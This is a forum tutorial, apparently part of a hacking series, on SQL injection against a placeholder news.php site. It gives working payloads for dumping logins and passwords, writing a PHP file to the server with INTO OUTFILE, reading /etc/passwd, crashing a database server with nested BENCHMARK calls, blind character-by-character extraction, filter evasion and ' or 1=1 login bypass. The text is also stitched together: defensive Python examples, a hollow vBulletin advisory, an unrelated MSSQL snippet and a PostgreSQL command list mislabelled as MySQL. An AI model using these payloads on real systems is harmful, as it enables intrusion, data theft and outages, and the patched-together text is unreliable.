Assalam-o-Alaikum,
If you want to learn from the beginning you must watch my complete series from the start;
I am completing my series on MySQL injection:
- Lesson 1 And 2 Intro and type of Vulnerabilities
- Lesson 3 Learning about My SQL
- Lesson 4 Expert Learning About MySQL
************************************786**************************************
Describing tables / columns when you cannot access INFORMATION_SCHEMA
This is the painful option: plain brute force comes into play. Example:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 FROM tbl_name --
Keep choosing tbl_name until the error message disappears, i.e. until you stop seeing:
mysql_query(): Table 'tbl_name' doesn't exist
Suppose we try Users and, to our delight, the error message is gone and the page displays exactly as it does for
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 --
That means a table named Users exists, and we move on to enumerating its columns.
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,column_name,5,6 FROM Users --
Keep choosing col_name until the error message disappears:
mysql_query(): Unknown column 'col_name' in 'field list'
When the error message disappears, that column exists.
In this way we learn that the Users table has the columns login and password.
Retrieving the data. Call the script as http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 1,1 -- and it displays the login and password of the first nick in the Users table.
MySQL has an interesting feature, SELECT ... INTO OUTFILE, which lets you write data to a file. There is also the construction SELECT ... INTO DUMPFILE; they are almost identical and you can use either.
Example:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt'; --
And what stops us from writing a PHP file instead? Like this:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,' ',5,6 INTO OUTFILE '1.php' --
All that remains is to find the full path to the site's document root on the server and prefix it to 1.php. In principle you could find another error whose report reveals the path on the server, or write the file outside the web root and pick it up with a local include, but that is another topic.
Reading files
Consider the function LOAD_FILE:
http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('/etc/passwd'),4,5,6 --
Here too there are several limitations:
- The full path to the file must be given.
- The FILE privilege is required.
- The file must be located on the same server.
- The file size must be less than max_allowed_packet.
- The file must be readable by the account under which MySQL runs.
If the function cannot read the file it returns NULL.
**************
In most cases the SQL server gets DoS'ed simply because nothing else can be done: the tables/columns could not be discovered, there are no rights for this or that, and so on. I am honestly against this method, but still...
Let's get to the point ... www.H4ck3rCracks.com
The BENCHMARK function performs the same action several times.
SELECT BENCHMARK(100000, MD5(CURRENT_TIME));
Here this function computes md5(current_time) 100000 times, which on my computer takes about 0.7 seconds ... Not much, it seems ... But what if we try a nested BENCHMARK?
SELECT BENCHMARK(100000, BENCHMARK(100000, MD5(CURRENT_TIME)));
An example DoS in our case:
http://xxx/news.php?id=-1' UNION SELECT 1, 2, BENCHMARK(100000, BENCHMARK(100000, MD5(CURRENT_TIME))), 4, 5, 6 --
Hit F5 a hundred times and the server goes down hard.
**********
Character-by-character brute force
We need this case when http://xxx/news.php?id=1 gives different results for different id values, i.e. http://xxx/news.php?id=1 looks different from http://xxx/news.php?id=0.
If not, this method is useless, but it is worth finishing anyway.
The database query:
SELECT * FROM news WHERE id = '1'
Now we modify the vulnerable parameter id so that the query becomes
SELECT * FROM news WHERE id = '-1' OR id = IF(ASCII((SELECT USER()))>=254, '1', '0') -- ';
http://xxx/news.php?id=-1' OR id = IF(ASCII((SELECT USER()))>=254, '1', '0') --
First MySQL runs the subquery SELECT USER() and passes the result to the function ASCII(), which returns the ASCII code of the first character of the subquery result; the function IF() then returns 1 if the code is greater than or equal to 100.
The overall query becomes
SELECT * FROM news WHERE id = '-1' OR id = 1
which behaves like calling the script as http://xxx/news.php?id=1. If the code is less, the query is
SELECT * FROM news WHERE id = '-1' OR id = 0
which behaves like http://xxx/news.php?id=0. We will say, conditionally, that the query returns 1 (yes) or 0 (no) respectively, and begin guessing.
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100, '1', '0') --
Returned 1 again, so the code of the first character is greater than or equal to 100. We try:
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=200, '1', '0') --
Returned 0, so 100 <= code < 200.
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=150, '1', '0') --
Returned 0 again, so 100 <= code < 150.
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=125, '1', '0') --
Returned 0 once more, so 100 <= code < 125.
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=113, '1', '0') --
Returned 1, therefore 113 <= code < 125.
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=118, '1', '0') --
Returned 0, therefore 113 <= code < 118.
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=115, '1', '0') --
So 113 <= code < 115.
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))=113, '1', '0') --
Returned 0, so the character code is not 113.
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))=114, '1', '0') --
Cheers! Returned 1, so the character code is 114. Converting it to a character gives "r". Now on to the next character:
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),2,1))>=100, '1', '0') --
What to do if there is no output field and error reporting is off? The BENCHMARK function comes to our aid. As described above, it performs one action several times. So what, you ask ... Here's what. Recall that the query
SELECT BENCHMARK(100000, BENCHMARK(100000, MD5(NOW())));
takes a very long time ^_^
We will brute-force, one character at a time, the name of the user under which we are connected to the database (the USER() function gives it to us):
http://xxx/news.php?id=-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100, 1, BENCHMARK(2999999, MD5(NOW()))) --
The query becomes
SELECT * FROM news WHERE id = '-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100, 1, BENCHMARK(2999999, MD5(NOW()))) -- ';
Again we brute-force the USER() string, except that now, instead of returning 0, the function makes the request take a very long time. The delay tells us the query returned 0; if there is no delay, the query returned 1.
Now about the time delay. To measure the response time for 0 and for 1, make a few preliminary requests:
http://xxx/news.php?id=-1' OR id = IF(99>100, 1, BENCHMARK(2999999, MD5(NOW()))) --
This returns 0; note how long it takes. Depending on your bandwidth, tune the number 2999999 so that you can reliably tell whether there was a delay compared with
http://xxx/news.php?id=-1' OR id = IF(101>100, 1, BENCHMARK(2999999, MD5(NOW()))) --
which returns 1.
After each BENCHMARK the SQL server needs some time to recover.
Error-based
This method relies on executing, instead of returning 0, a subquery that causes an error: the error output tells us that 0 was returned, and the absence of an error that 1 was returned. This method helps when there is no output field but error reporting is (!) enabled.
SELECT * FROM news WHERE id = '-1' OR id = (SELECT 1 UNION SELECT 2)
This produces an error, since id is compared with a subquery that returns two rows:
mysql_query(): Subquery returns more than 1 row
That was the theory. Now to the query with which we pick characters:
SELECT * FROM news WHERE id = '-1' OR id = IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100, 1, (SELECT 1 UNION SELECT 2)) -- ';
As seen from this query, if the character code is greater than or equal to 100 the IF() function returns 1 and there is no error; otherwise the function executes the subquery
SELECT 1 UNION SELECT 2
which returns two rows, causing an error when compared with id, and so we know the query returned 0.
A great disadvantage of this method is that huge numbers of errors pile up in the logs. A great advantage is speed.
Many have the impression that this is a hopeless case ... not with xXJoKeRXx. Well, we are going to change that view. Suppose a database query looks like this:
SELECT * FROM news ORDER BY $by
As usual the variable $by is not filtered, and the page displays a few rows from the database. We need two requests that change the page's appearance in some way, and they must be such that a subquery can influence the outcome. Such requests might be
http://xxx/news.php?by=id*1
http://xxx/news.php?by=id*-1
So the request for brute-forcing the user name will look like this:
http://xxx/news.php?by=id*IF(ASCII(SUBSTRING(USER(),1,1))=112,1,-1)
Hmm, the news came out in reverse order => false
http://xxx/news.php?by=id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1)
False again
http://xxx/news.php?by=id*IF(ASCII(SUBSTRING(USER(),1,1))=114,1,-1)
Oh! Direct order of news => true
We convert character code 114 to the symbol "r". Proceed to the next character, and so on.
So now,
WHAT TO DO IF SOMETHING IS FILTERED
Recall that in SQL the construction /**/ is equivalent to a space.
There is an interesting function CHAR() which, given a character code, returns the character itself. Suppose some character is filtered ... let's say the asterisk (*). First we need to know the code of this character. MySQL has the function ASCII(), which returns the code of the leftmost character of the string passed to it, so we use
SELECT ASCII('*');
Doing this on the vulnerable host makes no sense (the '*' character is filtered), so do it locally. We learn that the code is 42 and use the CHAR() function like this:
SELECT CHAR(42, 42, 42);
This outputs three asterisks. Another way is to use the hexadecimal character codes. Now suppose the word 'login' is filtered. MySQL has the function HEX(), which returns the hexadecimal code of a string. It is used like this:
SELECT HEX('login');
This produces '6C6F67696E'; prepend "0x" (so that SQL knows it is dealing with a hexadecimal value) to obtain '0x6C6F67696E'. It can be used without CHAR() like this:
SELECT 0x6C6F67696E FROM User;
or with CHAR() like this:
SELECT CHAR(0x6C, 0x6F, 0x67, 0x69, 0x6E) FROM User;
*******************************************************************************
Now I will explain another way of SQL attacks, where we depend on fatal errors or mistakes in web applications .... yeah, lousy developers who did not fully understand SQL injection
LOOK....!!!!!!!!
SQL injection error messages are very important ... when we send the site a nonsense SQL query it gives us back an error message. We examine this error message and try to find some clues in it. For example, suppose a site has a username and password form;
let's say we enter ' or 1=1 -- in those fields. If the site has an SQL vulnerability, it should give an error like the following:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'users' to a column of data type int.
/Index.asp, line 11
That is how we get an error. In plain words this error says:
Microsoft Database Drivers error '80040e07'
SQL Server: the 'users' table was not given a valid matching value; a syntax error has occurred.
/Index.asp, line 11
It does not end there. In SQL queries the following can also be used as the parameter:
' or 1=1 --
" or 1=1 --
' or 'a'='a
or 1=1 --
') or ('a'='a
" or "a"="a
Above we wrote ' or 1=1 -- in the username and password fields
because
the login condition then reduces to "or 1=1", which is always true (1 always equals 1, so this command works every time).
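The three injectable patterns discussed above (the news.php id parameter in WHERE id = '$id', the ORDER BY $by sort parameter, and the login form) share one root cause: request values are pasted into the SQL text. As an added example, not code from the original post, here is each pattern in its vulnerable form next to its fixed form on a constructed in-memory SQLite database (table and row contents are made up for the demo).

```python
"""Constructed demo (not from the original post): WHERE id='$id', ORDER BY $by
and a login check, each written the vulnerable way and the fixed way, on an
in-memory SQLite database with made-up rows."""
import sqlite3


def make_db():
    """Build a throwaway database shaped like the post's examples (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'first'), (2, 'second'), (3, 'third');
        CREATE TABLE users(login TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return con


# 1. WHERE id = '$id'
def news_by_id_vulnerable(con, id_param):
    # String concatenation: the quote in the parameter closes the literal and
    # the rest of the value becomes SQL (OR / UNION / IF run as written).
    return con.execute(
        "SELECT id, title FROM news WHERE id = '%s'" % id_param).fetchall()


def news_by_id_fixed(con, id_param):
    # A bound parameter is sent as data; it can never change the statement.
    return con.execute(
        "SELECT id, title FROM news WHERE id = ?", (id_param,)).fetchall()


# 2. ORDER BY $by
SORT_COLUMNS = {"id": "id", "title": "title"}   # allow-list of sortable columns


def safe_sort_column(by):
    """Map the request value onto the allow-list; None means reject."""
    return SORT_COLUMNS.get(by)


def news_sorted_vulnerable(con, by):
    # Identifiers cannot be bound, so concatenation here lets 'id*-1' or an
    # IF(...) expression steer the sort order, exactly as the post describes.
    return [r[0] for r in con.execute(
        "SELECT id FROM news ORDER BY " + by).fetchall()]


def news_sorted_fixed(con, by):
    column = safe_sort_column(by)
    if column is None:
        raise ValueError("unknown sort column: %r" % by)
    return [r[0] for r in con.execute(
        "SELECT id FROM news ORDER BY " + column).fetchall()]


# 3. Login check
def login_vulnerable(con, user, password):
    sql = ("SELECT COUNT(*) FROM users WHERE login = '%s' AND password = '%s'"
           % (user, password))
    return con.execute(sql).fetchone()[0] > 0


def login_fixed(con, user, password):
    row = con.execute(
        "SELECT COUNT(*) FROM users WHERE login = ? AND password = ?",
        (user, password)).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    print(news_by_id_vulnerable(db, "-1' OR 1=1 --"))   # every news row
    print(news_by_id_fixed(db, "-1' OR 1=1 --"))        # []
    print(news_sorted_vulnerable(db, "id*-1"))          # [3, 2, 1]
    print(login_vulnerable(db, "' or 1=1 --", "x"))     # True
    print(login_fixed(db, "' or 1=1 --", "x"))          # False
```

SQLite accepts the same `--` comment terminator as MySQL, so the post's payloads behave the same way against the concatenated queries here.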
USEFUL FUNCTIONS IN MYSQL
SQL language reference
USER() - returns the login name under which we are connected to MySQL
DATABASE() - returns the name of the database we are connected to
VERSION() - returns the MySQL version
----------------------------
ASCII(str) - returns the ASCII code of the first character of the string "str"
CHAR(xx1, xx2, ...) - returns a string consisting of the characters whose ASCII codes are xx1, xx2, etc.
HEX(str) - returns the hexadecimal representation of the string "str"
----------------------------
LENGTH(str) - returns the length of the string "str"
SUBSTRING(str, pos[, len]) - returns a substring of "str" of length len (to the end of the string if len is not specified), starting at position pos
LOCATE(substr, str[, pos]) - returns the position of the first occurrence of "substr" in the string "str", starting from position pos (from the beginning of "str" if not specified). Returns 0 if "substr" does not occur in "str".
----------------------------
LOWER(str) - converts the string "str" to lower case (I think only Latin letters)
CONCAT(param1, param2, ...) - joins the substrings into one string
CONCAT_WS(sep, param1, param2, ...) - joins the substrings into one string with the separator "sep"
----------------------------
IF(exp, ret1, ret2) - checks the condition exp; if it is true (not 0) returns ret1, otherwise returns ret2
----------------------------
expr BETWEEN min AND max - if the value of expr is greater than or equal to min and less than or equal to max, BETWEEN returns 1, otherwise 0
----------------------------
AES_DECRYPT(AES_ENCRYPT('string', 'bla'), 'bla') - in newer bugs the results are often encoded, and this construction can be used without much trouble.
**************************************************************
Comments in MySQL
# starts a comment in MySQL. Example:
SELECT pass, login FROM users # This is comment
is the same as
SELECT pass, login FROM users
-- is another form of comment in MySQL. A space after the sign is required. Example:
SELECT pass, login FROM users -- This is comment
/* */ are C-style comments in MySQL. The closing part is optional. For MySQL such a comment is identical to a space. Example:
SELECT pass, login FROM users /* This is comment
SELECT pass, login /* This is comment */ FROM users
SELECT/**/pass, login/**/FROM/**/users
/*!int */ is an extension of the previous comment. Everything enclosed in this comment is interpreted as part of the SQL query if the MySQL version number is greater than or equal to the number int after the exclamation mark. Example:
SELECT pass /*!32302, login */ FROM users
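The inference queries, the /**/ and 0x... evasions, and the comment forms just listed all leave recognisable traces in web-server logs. As an added example, not from the original post, here is a small detector run over constructed access-log lines (made up for the demo, not real traffic) that undoes those evasions before matching, including keeping the contents of /*! */ version comments, which MySQL executes. The rule names and regexes are my own.

```python
"""Added example (not from the original post): flag injection patterns in
constructed access-log lines after normalising comment and hex evasions."""
import re
from urllib.parse import unquote_plus

# Constructed log lines in common log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=-1%27%20UNION%20SELECT%201,2,login,password,5,6%20FROM%20Users%20LIMIT%201,1%20-- HTTP/1.1" 200 530
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=-1%27%20OR%20id=IF(ASCII(SUBSTRING((SELECT%20USER()),1,1))%3E=100,1,BENCHMARK(2999999,MD5(NOW()))) HTTP/1.1" 200 12
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /news.php?id=-1%27/**/UNION/**/SELECT/**/1,2,3,0x6C6F67696E,5,6/**/INTO/**/OUTFILE/**/%271.php%27-- HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?by=id*IF(ASCII(SUBSTRING(USER(),1,1))=114,1,-1) HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?id=-1%27%20UNION%20SELECT%201,2,LOAD_FILE(%27/etc/passwd%27),4,5,6 HTTP/1.1" 200 4096
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /news.php?id=-1%27/*!UNION*//*!SELECT*/1,2,3,4,5,6/*!FROM*/Users-- HTTP/1.1" 200 530
"""

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# (rule name, regex applied to the normalised, lower-cased query string)
RULES = [
    ("union-select",  r"\bunion\b.*\bselect\b"),
    ("timing-probe",  r"\bbenchmark\s*\("),
    ("boolean-probe", r"\bif\s*\(\s*ascii\s*\(|\bsubstring\s*\(\s*\(?\s*select\b|\buser\s*\(\s*\)"),
    ("file-write",    r"\binto\s+(?:out|dump)file\b"),
    ("file-read",     r"\bload_file\s*\("),
    ("schema-probe",  r"\binformation_schema\b"),
]


def normalize(query):
    """Undo the evasions a plain keyword filter would miss, so the rules see plain SQL."""
    q = unquote_plus(unquote_plus(query))            # also handles double URL-encoding
    # /*!...*/ is executed by MySQL, so keep its contents; a plain /*...*/ is a space.
    q = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", q)
    q = re.sub(r"/\*.*?\*/", " ", q)
    # 0x6C6F67696E means the string 'login' to MySQL; decode hex literals the same way.
    q = re.sub(r"\b0x((?:[0-9a-fA-F]{2})+)\b",
               lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), q)
    return re.sub(r"\s+", " ", q).strip().lower()


def scan(log_text):
    """Return (client_ip, path, [matched rule names]) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        path, _, query = url.partition("?")
        norm = normalize(query)
        names = [name for name, pattern in RULES if re.search(pattern, norm)]
        if names:
            hits.append((ip, path, names))
    return hits


def suspicious_clients(hits):
    """Count flagged requests per client IP; a blind brute force stands out here."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(suspicious_clients(scan(SAMPLE_LOG)))
```

A character-by-character brute force needs one request per guess, so the per-client count from suspicious_clients() climbs quickly even when each individual request looks harmless.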
*************************
SQL-Injection: (Fixed in vB 3.0.9)
> /Joinrequests.php:
POST:
> /AdminCP/User.php:
GET:
GET:
> /AdminCP/usertitle.php:
GET:
> /AdminCP/usertools.php:
GET:
o XSS: (Fixed in vB 3.0.9)
=================================================================
> /AdminCP/css.php:
GET:
> /AdminCP/index.php:
GET:
> /AdminCP/User.php:
GET:
> /AdminCP/language.php:
GET:
> /AdminCP/modlog.php:
GET:
> /AdminCP/template.php:
GET:
GET:
GET:
o Arbitrary File Upload:
=================================================================
A user with access to the administrator panel (e.g. a (Co-)Administrator) and
the privilege to add avatars / icons / smileys is able to upload arbitrary
files. An attacker is thereby able to execute commands in
the context of the web server.
> /AdminCP/image.php:
POST:
POST:
POST:
****************************
Getting a random record from a table
declare @sql varchar(500)   /* this variable holds our SQL statement */
declare @rowCnt int         /* how many records the table holds */
declare @top int            /* which record will be the chosen one */
select @rowCnt = count(*) from district      /* how many records are in our table */
select @top = cast(rand() * @rowCnt as int)  /* produce a random number */
/* build the SQL statement that will bring back our random record */
set @sql = 'select top 1 tt.* from district tt
            where tt.icKod not in
            (select top ' + cast(@top as varchar) + ' icKod from district)'
exec (@sql)   /* run the generated SQL and wait for the result */
I have a table with this structure:
CREATE TABLE [dbo].[district] ([icKod] [smallint] NOT NULL, [icDesc] [varchar](16) COLLATE Turkish_CI_AS NULL) ON [PRIMARY]
INSERT INTO district (icKod, icDesc) VALUES (4, 'BAKIRKÖY');
INSERT INTO district (icKod, icDesc) VALUES (3, 'BAHÇELİEVLER');
INSERT INTO district (icKod, icDesc) VALUES (2, 'Bagcilar');
INSERT INTO district (icKod, icDesc) VALUES (1, 'AVCILAR');
INSERT INTO district (icKod, icDesc) VALUES (5, 'Bayrampasa');
Useful Commands In SQL Injection
These commands are useful for injection:
ABORT - abort the current transaction
ALTER DATABASE - change a database
ALTER GROUP - add users to a group or remove users from a group
ALTER TABLE - change the definition of a table
ALTER TRIGGER - change the definition of a trigger
ALTER USER - change a database user account
ANALYZE - collect statistics about a database
BEGIN - start a transaction block
CHECKPOINT - force a transaction log checkpoint
CLOSE - close a cursor
CLUSTER - cluster a table according to an index
COMMENT - define or change the comment of an object
COMMIT - commit the current transaction
COPY - copy data between files and tables
CREATE AGGREGATE - define a new aggregate function
CREATE CAST - define a user-defined cast
CREATE CONSTRAINT TRIGGER - define a new constraint trigger
CREATE CONVERSION - define a user-defined conversion
CREATE DATABASE - create a new database
CREATE DOMAIN - define a new domain
CREATE FUNCTION - define a new function
CREATE GROUP - define a new user group
CREATE INDEX - define a new index
CREATE LANGUAGE - define a new procedural language
CREATE OPERATOR - define a new operator
CREATE OPERATOR CLASS - define a new operator class for indexes
CREATE RULE - define a new rewrite rule
CREATE SCHEMA - define a new schema
CREATE SEQUENCE - define a new sequence generator
CREATE TABLE - define a new table
CREATE TABLE AS - create a new table from the results of a query
CREATE TRIGGER - define a new trigger
CREATE TYPE - define a new data type
CREATE USER - define a new database user account
CREATE VIEW - define a new view
DEALLOCATE - remove a prepared query
DECLARE - define a cursor
DELETE - delete rows of a table
DROP AGGREGATE - remove a user-defined aggregate function
DROP CAST - remove a user-defined cast
DROP CONVERSION - remove a user-defined conversion
DROP DATABASE - remove a database
DROP DOMAIN - remove a user-defined domain
DROP FUNCTION - remove a user-defined function
DROP GROUP - remove a user group
DROP INDEX - remove an index
DROP LANGUAGE - remove a user-defined procedural language
DROP OPERATOR - remove a user-defined operator
DROP OPERATOR CLASS - remove a user-defined operator class
DROP RULE - remove a rewrite rule
DROP SCHEMA - remove a schema
DROP SEQUENCE - remove a sequence
DROP TABLE - remove a table
DROP TRIGGER - remove a trigger
DROP TYPE - remove a user-defined data type
DROP USER - remove a database user account
DROP VIEW - remove a view
END - commit the current transaction
EXECUTE - execute a prepared query
EXPLAIN - show the execution plan of a statement
FETCH - retrieve rows from a table using a cursor
GRANT - define access privileges
INSERT - create new rows in a table
LISTEN - listen for a notification
LOAD - load or reload a shared library file
LOCK - explicitly lock a table
MOVE - position a cursor on a specified row of a table
NOTIFY - generate a notification
PREPARE - create a prepared query
REINDEX - rebuild corrupted indexes
RESET - restore the value of a run-time parameter to a default value
REVOKE - remove access privileges
ROLLBACK - abort the current transaction
SELECT - retrieve rows from a table or view
SELECT INTO - create a new table from the results of a query
SET - change a run-time parameter
SET CONSTRAINTS - set the constraint mode of the current transaction
SET SESSION AUTHORIZATION - set the session user identifier and the current user identifier of the current session
SET TRANSACTION - set the characteristics of the current transaction
SHOW - show the value of a run-time parameter
START TRANSACTION - start a transaction block
TRUNCATE - empty a table
UNLISTEN - stop listening for a notification
UPDATE - update rows of a table
VACUUM - garbage-collect and optionally analyze a database
END For MySQL
:P Now give your feedback; I want to see what the comments will be.
Regards,
Zulqurnain jutt
I don't understand anything, but you could explain it better with a video applied to one site; I think that would be better. Thanks.